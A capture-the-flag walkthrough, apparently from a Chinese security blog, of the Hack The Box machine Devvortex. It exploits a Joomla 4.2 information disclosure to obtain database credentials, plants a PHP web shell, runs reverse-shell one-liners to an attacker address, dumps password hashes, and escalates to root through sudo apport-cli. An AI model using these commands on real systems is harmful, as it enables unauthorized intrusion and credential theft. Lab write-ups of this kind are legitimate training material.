2023年12月19日13:46:08评论93 views字数 8976阅读29分55秒阅读模式

知识点：Joomla!_v4.2_Unauthenticated_information_disclosure，apport-cli提权

HTB-Devvortex（Easy）

Scan

┌──(kali㉿kali)-[~/Desktop/htb/Devvortex]└─$ sudo nmap -sT --min-rate 10000 -p- 10.10.11.242 [sudo] password for kali: Sorry, try again.[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 01:06 ESTWarning: 10.10.11.242 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.11.242Host is up (0.30s latency).Not shown: 41304 filtered tcp ports (no-response), 24229 closed tcp ports (conn-refused)PORT   STATE SERVICE22/tcp open  ssh80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 172.01 seconds                                                                                                                                                                                            ┌──(kali㉿kali)-[~/Desktop/htb/Devvortex]└─$ sudo nmap -sT -sV -O -p22,80 10.10.11.242      Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 01:09 ESTNmap scan report for devvortex.htb (10.10.11.242)Host is up (0.32s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)80/tcp open  http    nginx 1.18.0 (Ubuntu)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 5.0 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.8 (93%), Linux 3.8 (93%), QNAP QTS 4.0 - 4.2 (93%), Linux 5.3 - 5.4 (93%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 20.38 seconds

Enum

扫目录，没发现什么有用的信息，扫一下子域名，发现dev

wfuzz -c -w ~/wordlists/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb" --hh 154

HTB-Devvortex（Easy） hosts后再扫一下新域名的目录，发现多的一笔，有robots.txt和README.txt等敏感信息。主要是administrator这个路由。

HTB-Devvortex（Easy）这里可以看到版本号是Joomla! 4.2，

administrator路由是登录框，需要账号密码。 HTB-Devvortex（Easy） searchsploit Joomla! 4

HTB-Devvortex（Easy） locate进去看到是CVE-2023-23752 网上一搜一大把，是个未授权

可以查看文章：https://xz.aliyun.com/t/12175

访问：http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

HTB-Devvortex（Easy）这里也可以打msf

use auxiliary/scanner/http/joomla_api_improper_access_checksset rhosts dev.devvortex.htb
#[+] Users JSON saved to /home/kali/.msf4/loot/20231126024141_default_10.10.11.242_joomla.users_040378.bin[+] Joomla Users============
 ID   Super User  Name        Username  Email                Send Email  Register Date        Last Visit Date      Group Names --   ----------  ----        --------  -----                ----------  -------------        ---------------      ----------- 649  *           lewis       lewis     [email protected]  1           2023-09-25 16:44:24  2023-11-26 07:37:20  Super Users 650              logan paul  logan     [email protected]  0           2023-09-26 19:15:42                       Registered
[+] Config JSON saved to /home/kali/.msf4/loot/20231126024143_default_10.10.11.242_joomla.config_378615.bin[+] Joomla Config=============
 Setting        Value -------        ----- db encryption  0 db host        localhost db name        joomla db password    P4ntherg0t1n5r3c0n## db prefix      sd4fg_ db user        lewis dbtype         mysqli

HTB-Devvortex（Easy）

Getshell

这里拿到的账号密码可以登录，找system修模恶意板

https://github.com/flozz/p0wny-shell/blob/master/shell.php

HTB-Devvortex（Easy）执行反弹即可拿到www权限的shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.20 4444 >/tmp/fphp -r '$sock=fsockopen("10.10.14.20",4444);exec("sh <&3 >&3 2>&3");'或者等等rev都行

用py注个ttyshell，刚刚是扫出了数据库，登录数据库，看到有账户hash，发现home目录下有logan用户，爆它

┌──(kali㉿kali)-[~/Desktop/htb]└─$ sudo nc -nlvp 4444listening on [any] 4444 ...connect to [10.10.14.20] from (UNKNOWN) [10.10.11.242] 37150iduid=33(www-data) gid=33(www-data) groups=33(www-data)python3 -c "import pty;pty.spawn('/bin/bash')"www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ mysql -ulewis -pmysql -ulewis -pEnter password: P4ntherg0t1n5r3c0n##
Welcome to the MySQL monitor.  Commands end with ; or g.Your MySQL connection id is 8675Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or itsaffiliates. Other names may be trademarks of their respectiveowners.
Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
mysql> show databases;  show databases;+--------------------+| Database           |+--------------------+| information_schema || joomla             || performance_schema |+--------------------+3 rows in set (0.01 sec)
mysql> use joomlause joomlaReading table information for completion of table and column namesYou can turn off this feature to get a quicker startup with -A
Database changedmysql> show tables;show tables;+-------------------------------+| Tables_in_joomla              |+-------------------------------+| sd4fg_action_log_config       || sd4fg_action_logs             || sd4fg_action_logs_extensions  || sd4fg_action_logs_users       || sd4fg_assets                  || sd4fg_associations            || sd4fg_banner_clients          || sd4fg_banner_tracks           || sd4fg_banners                 || sd4fg_categories              || sd4fg_contact_details         || sd4fg_content                 || sd4fg_content_frontpage       || sd4fg_content_rating          || sd4fg_content_types           || sd4fg_contentitem_tag_map     || sd4fg_extensions              || sd4fg_fields                  || sd4fg_fields_categories       || sd4fg_fields_groups           || sd4fg_fields_values           || sd4fg_finder_filters          || sd4fg_finder_links            || sd4fg_finder_links_terms      || sd4fg_finder_logging          || sd4fg_finder_taxonomy         || sd4fg_finder_taxonomy_map     || sd4fg_finder_terms            || sd4fg_finder_terms_common     || sd4fg_finder_tokens           || sd4fg_finder_tokens_aggregate || sd4fg_finder_types            || sd4fg_history                 || sd4fg_languages               || sd4fg_mail_templates          || sd4fg_menu                    || sd4fg_menu_types              || sd4fg_messages                || sd4fg_messages_cfg            || sd4fg_modules                 || sd4fg_modules_menu            || sd4fg_newsfeeds               || sd4fg_overrider               || sd4fg_postinstall_messages    || sd4fg_privacy_consents        || sd4fg_privacy_requests        || sd4fg_redirect_links          || sd4fg_scheduler_tasks         || sd4fg_schemas                 || sd4fg_session                 || sd4fg_tags                    || sd4fg_template_overrides      || sd4fg_template_styles         || sd4fg_ucm_base                || sd4fg_ucm_content             || sd4fg_update_sites            || sd4fg_update_sites_extensions || sd4fg_updates                 || sd4fg_user_keys               || sd4fg_user_mfa                || sd4fg_user_notes              || sd4fg_user_profiles           || sd4fg_user_usergroup_map      || sd4fg_usergroups              || sd4fg_users                   || sd4fg_viewlevels              || sd4fg_webauthn_credentials    || sd4fg_workflow_associations   || sd4fg_workflow_stages         || sd4fg_workflow_transitions    || sd4fg_workflows               |+-------------------------------+71 rows in set (0.01 sec)
mysql> select * from sd4fg_users;select * from sd4fg_users;+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+| id  | name       | username | email               | password                                                     | block | sendEmail | registerDate        | lastvisitDate       | activation | params                                                                                                                                                  | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+| 649 | lewis      | lewis    | [email protected] | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |     0 |         1 | 2023-09-25 16:44:24 | 2023-11-26 08:08:20 | 0          |                                                                                                                                                         | NULL          |          0 |        |      |            0 |              || 650 | logan paul | logan    | [email protected] | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |     0 |         0 | 2023-09-26 19:15:42 | NULL                |            | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL          |          0 |        |      |            0 |              |+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+2 rows in set (0.00 sec)
mysql>

HTB-Devvortex（Easy）

ROOT

sudo -l发现可以sudo提权

参考：https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb

HTB-Devvortex（Easy）看了下/var/crash下没东西换一个打法 rg：按V后!id输入命令即可

sudo apport-cli -c /bin/id less

HTB-Devvortex（Easy）

root:$6$kdYdkbdlt4MMS7Qx$/lIiEByq.cgsQPyd82QDfhA/Qb5IgaukiUN0OOKewugqr1qeFFiQ4t2sAdiyAmUssoeg3.h1k/2BpdTRthmum.:19654:0:99999:7:::daemon:*:18375:0:99999:7:::bin:*:18375:0:99999:7:::sys:*:18375:0:99999:7:::sync:*:18375:0:99999:7:::games:*:18375:0:99999:7:::man:*:18375:0:99999:7:::lp:*:18375:0:99999:7:::mail:*:18375:0:99999:7:::news:*:18375:0:99999:7:::uucp:*:18375:0:99999:7:::proxy:*:18375:0:99999:7:::www-data:*:18375:0:99999:7:::backup:*:18375:0:99999:7:::list:*:18375:0:99999:7:::irc:*:18375:0:99999:7:::gnats:*:18375:0:99999:7:::nobody:*:18375:0:99999:7:::systemd-network:*:18375:0:99999:7:::systemd-resolve:*:18375:0:99999:7:::systemd-timesync:*:18375:0:99999:7:::messagebus:*:18375:0:99999:7:::syslog:*:18375:0:99999:7:::_apt:*:18375:0:99999:7:::tss:*:18375:0:99999:7:::uuidd:*:18375:0:99999:7:::tcpdump:*:18375:0:99999:7:::landscape:*:18375:0:99999:7:::pollinate:*:18375:0:99999:7:::sshd:*:18389:0:99999:7:::systemd-coredump:!!:18389::::::lxd:!:18389::::::usbmux:*:18822:0:99999:7:::fwupd-refresh:*:19612:0:99999:7:::mysql:!:19624:0:99999:7:::logan:$6$pkg18zw/pi3z1r.f$g.zN3Yi1iLQmEcsi5S57UMl7qWgUNoo8xA3Z4TczzM1nMK5NhXgW0J.DPvS4lG9UISgGk5zsYDOpk7uPBY2Ya1:19626:0:99999:7:::_laurel:!:19656::::::

原文始发于微信公众号（搁浅安全）：HTB-Devvortex（Easy）

左青龙
微信扫一扫

右白虎
微信扫一扫

HTB-Devvortex（Easy）

Scan

Enum

Getshell

ROOT

通过SSL证书进行信息收集总结

你的流量真的走代理了吗？

通过OpenWrt实现kali全局代理

Symantec+EDR极端白名单策略下的C&C Bypass 研究

记一次真实的信息收集

内网穿透实例讲解

ARP局域网断网攻击原理及防御

记一次对某非法微盘的渗透

Tomcat容器攻防笔记之URI解析特性分析

SolarWinds旗下软件被用于供应链攻击事件分析

发表评论

在线咨询

微信